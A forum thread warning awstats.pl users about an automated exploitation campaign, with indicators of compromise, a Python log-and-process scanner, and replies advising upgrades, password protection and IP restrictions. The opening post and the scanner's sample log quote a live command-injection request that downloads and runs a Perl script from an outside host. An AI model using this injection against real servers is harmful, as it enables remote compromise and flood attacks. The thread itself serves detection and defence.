Beware of attacks against awstats.pl

If you use the awstats web statistics perl script, be warned that there is an automated process exploiting buffer overflow vulnerabilities and spawning off flood attacks. Anyone who uses awstats should check ASAP for the following things to see if you have been compromised:

1) Entries in your apache access logs with the following form:

    GET /awstats/awstats.pl?configdir=|echo%20;cd%20/var/tmp;killall%20-9%20perl;wget%20http://alekso.mine.nu/a1.txt;perl%20a1.txt|

2) The presence of running processes named 'udp.pl', 'egx', or 'f3', or the presence of these files on the filesystem (most likely in /var/tmp).

3) Lots of UDP traffic directed against random hosts (the processes use a random number generator using /dev/urandom to generate targets).

Fix: Remove, disable, or password protect awstats.pl. Unknown if there is a fix available.

John
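The checklist above can be automated. The following is an added example, not code from the original post: it decodes the `configdir` query parameter of each Apache access-log request line and flags any value carrying `|` or `;`, which is the shape of the payload quoted above, and it matches a `ps -eo pid,comm` listing against the process names the post names. The log lines, IP addresses, timestamps and `ps` output are constructed for the example; only the injected payload string is taken from the post.

```python
import re
from urllib.parse import unquote

# Request field of an Apache common/combined log line: "METHOD TARGET PROTO"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"')

# Process / file names the post lists as indicators of this bot.
INDICATOR_NAMES = {"udp.pl", "egx", "f3"}

# Constructed sample log: two benign requests around one copy of the payload
# quoted in the post (IPs and timestamps are made up for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [15/Feb/2005:10:01:22 +0000] "GET /awstats/awstats.pl?config=example.com HTTP/1.1" 200 5120
203.0.113.9 - - [15/Feb/2005:10:02:47 +0000] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/var/tmp;killall%20-9%20perl;wget%20http://alekso.mine.nu/a1.txt;perl%20a1.txt| HTTP/1.0" 200 2048
10.0.0.7 - - [15/Feb/2005:10:03:01 +0000] "GET /index.html HTTP/1.1" 200 312
"""

# Constructed `ps -eo pid,comm` output containing two of the indicator names.
SAMPLE_PS = """\
  PID COMMAND
    1 init
  812 httpd
 2231 perl
 2240 udp.pl
 2241 egx
"""


def extract_configdir(target):
    """Return the URL-decoded configdir value of an awstats.pl request, else None."""
    path, sep, query = target.partition("?")
    if not sep or not path.endswith("awstats.pl"):
        return None
    for param in query.split("&"):
        name, _, value = param.partition("=")
        if name == "configdir":
            return unquote(value)
    return None


def is_injection(configdir):
    """The payload in the post wraps a shell pipeline in '|'; a legitimate
    directory name never contains '|' or ';', so either character is hostile."""
    return configdir is not None and ("|" in configdir or ";" in configdir)


def scan_access_log(text):
    """Return (line_no, client_ip, injected_command) for every exploit attempt."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        configdir = extract_configdir(m.group("target"))
        if is_injection(configdir):
            client_ip = line.split(" ", 1)[0]
            hits.append((line_no, client_ip, configdir.strip("|")))
    return hits


def indicator_processes(ps_text):
    """Parse `ps -eo pid,comm` output; return (pid, name) for indicator names."""
    found = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[1].strip() in INDICATOR_NAMES:
            found.append((int(parts[0]), parts[1].strip()))
    return found


if __name__ == "__main__":
    for line_no, ip, cmd in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {ip} injected: {cmd}")
    for pid, name in indicator_processes(SAMPLE_PS):
        print(f"indicator process {name} running as pid {pid}")
```

On a real host, feed `scan_access_log` the contents of your access log and `indicator_processes` the output of `ps -eo pid,comm`; the decoded command tells you which download URL and filenames to look for under /var/tmp.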

6 Replies

Version 6.4 of awstats was released a bit over a month ago when this vulnerability was discovered. If you have installed awstats via apt-get or similar and regularly run apt-get update && apt-get upgrade or your distribution of choice's equivalent, you should already have the fixed version installed, but should double-check this.

Michael

Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.

Probably an entire new thread, but in theory running Apache in a SELinux sandbox would go a long way to limit the consequences of an exploit of any script or the server process itself. Is SELinux even possible under UML (2.6 kernel)?

John

SELinux isn't installed in the UML kernel, so linodes can't take advantage of it.

Easiest way to protect your awstats? chmod 700 the folder when not viewing stats :)

@tierra:

> Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.

I keep a lot of things like this (webalizer, server-status, munin) protected by .htaccess files that only allow access from my own IP (and the proxy server at work).

    Order deny,allow
    Deny from all
    Allow from 192.168.1.0/24
    Allow from 111.222.333.0/24
    Allow from 127.0.0.0/8
